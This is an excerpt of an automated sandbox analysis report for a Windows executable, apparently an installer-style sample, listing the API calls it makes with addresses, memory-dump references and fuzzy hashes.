                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: d8dd424ede50ccfac4b7523ad15fca3fe61b3a2743ebd4ec855a49df1000c641
                                                  • Instruction ID: fb2ec3850198e6a3c32e9ec6a0d6f7e4a8645a4513041e6eac74538e2b64e397
                                                  • Opcode Fuzzy Hash: d8dd424ede50ccfac4b7523ad15fca3fe61b3a2743ebd4ec855a49df1000c641
                                                  • Instruction Fuzzy Hash: 51C04C30A18642DBD6505B20ED087177950AB50741F60CD35610BF11A0D6759811DD3E
                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040321F,00000000,00000000,00403076,000000FF,00000004,00000000,00000000,00000000), ref: 00405C86
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: a00b84ef068ec3340bdddd9f42ca8c04165d68640cb73732be2406276cbef438
                                                  • Instruction ID: ef4ecac980915e2f81eec60b371ea7b66f7146230b2cbae24b16510ac7dd1765
                                                  • Opcode Fuzzy Hash: a00b84ef068ec3340bdddd9f42ca8c04165d68640cb73732be2406276cbef438
                                                  • Instruction Fuzzy Hash: 53E0EC3265835AABEF109E659C08AEB7B6CEB05360F004432F915E6190D271E8219BA5
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: 47bb742b83de058295ea66ad7c8c51c1fc329d8dacee4bb1f88cf71d1c5c0238
                                                  • Instruction ID: 2fd216668262c1d23633d06d3759517c993b1d1f21998de780648112abb91376
                                                  • Opcode Fuzzy Hash: 47bb742b83de058295ea66ad7c8c51c1fc329d8dacee4bb1f88cf71d1c5c0238
                                                  • Instruction Fuzzy Hash: 64E08676244108BFDB00DFA4DD47FD577ECEB44700F004421BA08D7091C774E5408768
                                                  APIs
                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004031ED,00000000,0040BEA0,?,0040BEA0,?,000000FF,00000004,00000000), ref: 00405CB5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: 00c0377323aa53eb430c82b83f01e62a2601c7c92c94a0140a128221a0f71a88
                                                  • Instruction ID: ba43a9b4bceeecaa6f2f3e0d34fbf098cac3b3b9582c4b6c2afca3054f4c0e18
                                                  • Opcode Fuzzy Hash: 00c0377323aa53eb430c82b83f01e62a2601c7c92c94a0140a128221a0f71a88
                                                  • Instruction Fuzzy Hash: 53E08632114319ABDF105E509C40EEB3B6CEB00350F004432F915E3180D231F8219BA4
                                                  APIs
                                                  • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 63af328b00465f59fb2cda4c97b9098d74f73ba70fcdcf535c76db650ef10719
                                                  • Instruction ID: 2fe99779569e854a2b198351ad46a615925f3dbe2af7ba97a80adff3512ae0b7
                                                  • Opcode Fuzzy Hash: 63af328b00465f59fb2cda4c97b9098d74f73ba70fcdcf535c76db650ef10719
                                                  • Instruction Fuzzy Hash: 14D01232B04100D7CB10DFA89A0869D7765AB80334B208677D511F21E5D6B8C5515A29
                                                  APIs
                                                  • SetDlgItemTextW.USER32(?,?,00000000), ref: 004040F8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: ItemText
                                                  • String ID:
                                                  • API String ID: 3367045223-0
                                                  • Opcode ID: 836752284e77a14f9f437ff7d5b3b9fcb1aabd91b302fccfee7ccff944b3486d
                                                  • Instruction ID: 75ed730bb2b613b48c7a297b90080a36780f3c121d84e6c4710399c264b67fe8
                                                  • Opcode Fuzzy Hash: 836752284e77a14f9f437ff7d5b3b9fcb1aabd91b302fccfee7ccff944b3486d
                                                  • Instruction Fuzzy Hash: B9C04C75148240FFE751A759CC42F1FB79DEFA4366F00C52EB15CE11D2C63594209A26
                                                  APIs
                                                  • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040413C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                  • Instruction ID: 41fb3c375bc4c6d8b97388dc18782044d705989845ec456808571e00864cea1f
                                                  • Opcode Fuzzy Hash: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                  • Instruction Fuzzy Hash: 76C09B717443017BDA308F509D49F1777556794B40F54C8797700F60D0C674E451D61D
                                                  APIs
                                                  • SendMessageW.USER32(00000028,?,00000001,00403F3F), ref: 00404121
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                  • Instruction ID: c6b71f3973dfff953bb7db756b4a53cf392e498aed0f9e65811aff82f73edd61
                                                  • Opcode Fuzzy Hash: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                  • Instruction Fuzzy Hash: 81B09235684200BADA214B00ED09F867A62A768701F008864B300240B0C6B244A2DB19
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\x295IO8kqM.exe",00403500,?), ref: 00403230
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 500ff757afade42e276d5337a77ed9e8e494b853a2931491cde3850712262a81
                                                  • Instruction ID: 0576ba63ef0ea8b46fce932fbf196e130763cebcf3e43c4cce3b0366b0281484
                                                  • Opcode Fuzzy Hash: 500ff757afade42e276d5337a77ed9e8e494b853a2931491cde3850712262a81
                                                  • Instruction Fuzzy Hash: 64B01231584200BFDB214F00DE05F057B21A790700F10C030B304780F082712460EB0D
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,00403ED8), ref: 0040410A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                  • Instruction ID: 8b53a25d375a508ca0f68064fdc939b5f25de369c98bd294fc40859475f67141
                                                  • Opcode Fuzzy Hash: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                  • Instruction Fuzzy Hash: 02A01132808000ABCA028BA0EF08C0ABB22BBB8300B008A3AB2008003082320820EB0A
                                                  APIs
                                                  • CloseHandle.KERNEL32(FFFFFFFF,004035BC,?), ref: 00403794
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle
                                                  • String ID:
                                                  • API String ID: 2962429428-0
                                                  • Opcode ID: 5710361185e24ba61aa786e643b1adbae5e3df09b0f5677f9457fc33726266e3
                                                  • Instruction ID: 1f63430003a56ffcfaaebf3c9c5421766b98a4ac001f0abc9f2c2bb0a1b0cb20
                                                  • Opcode Fuzzy Hash: 5710361185e24ba61aa786e643b1adbae5e3df09b0f5677f9457fc33726266e3
                                                  • Instruction Fuzzy Hash: BDC022B040460046D0202F348E8B6083A146740B3AFA08335B0F8B10F1C33C0A41841C
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404B0D
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404B18
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B62
                                                  • LoadBitmapW.USER32(0000006E), ref: 00404B75
                                                  • SetWindowLongW.USER32(?,000000FC,004050ED), ref: 00404B8E
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BA2
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BB4
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404BCA
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BD6
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404BE8
                                                  • DeleteObject.GDI32(00000000), ref: 00404BEB
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C16
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C22
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CB8
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CE3
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF7
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404D26
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D34
                                                  • ShowWindow.USER32(?,00000005), ref: 00404D45
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E42
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EA7
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EBC
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EE0
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F00
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404F15
                                                  • GlobalFree.KERNEL32(?), ref: 00404F25
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404F9E
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00405047
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405056
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00405076
                                                  • ShowWindow.USER32(?,00000000), ref: 004050C4
                                                  • GetDlgItem.USER32(?,000003FE), ref: 004050CF
                                                  • ShowWindow.USER32(00000000), ref: 004050D6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 1638840714-813528018
                                                  • Opcode ID: 04f3f42b2e655a6bf1bbe546ad9d96aad2a2205ad87ede7fab540f4b471b76d2
                                                  • Instruction ID: 2f8963ba0b06e8e3d6cb077b811a33c65d2f4829f178f5176880c359a33aa38b
                                                  • Opcode Fuzzy Hash: 04f3f42b2e655a6bf1bbe546ad9d96aad2a2205ad87ede7fab540f4b471b76d2
                                                  • Instruction Fuzzy Hash: 1D026FB0A00209EFDB249F54DD45AAE7BB5FB84314F10857AF610BA2E1C7799D42CF58
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 004045C8
                                                  • SetWindowTextW.USER32(00000000,?), ref: 004045F2
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 004046A3
                                                  • CoTaskMemFree.OLE32(00000000), ref: 004046AE
                                                  • lstrcmpiW.KERNEL32(Execute: ,004226E8,00000000,?,?), ref: 004046E0
                                                  • lstrcatW.KERNEL32(?,Execute: ), ref: 004046EC
                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046FE
                                                    • Part of subcall function 00405743: GetDlgItemTextW.USER32(?,?,00000400,00404735), ref: 00405756
                                                    • Part of subcall function 004062AE: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\x295IO8kqM.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406311
                                                    • Part of subcall function 004062AE: CharNextW.USER32(?,?,?,00000000), ref: 00406320
                                                    • Part of subcall function 004062AE: CharNextW.USER32(?,00000000,76CF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\x295IO8kqM.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406325
                                                    • Part of subcall function 004062AE: CharPrevW.USER32(?,?,76CF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\x295IO8kqM.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406338
                                                  • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000001,004206B8,?,?,000003FB,?), ref: 004047C1
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047DC
                                                    • Part of subcall function 00404935: lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049D6
                                                    • Part of subcall function 00404935: wsprintfW.USER32 ref: 004049DF
                                                    • Part of subcall function 00404935: SetDlgItemTextW.USER32(?,004226E8), ref: 004049F2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
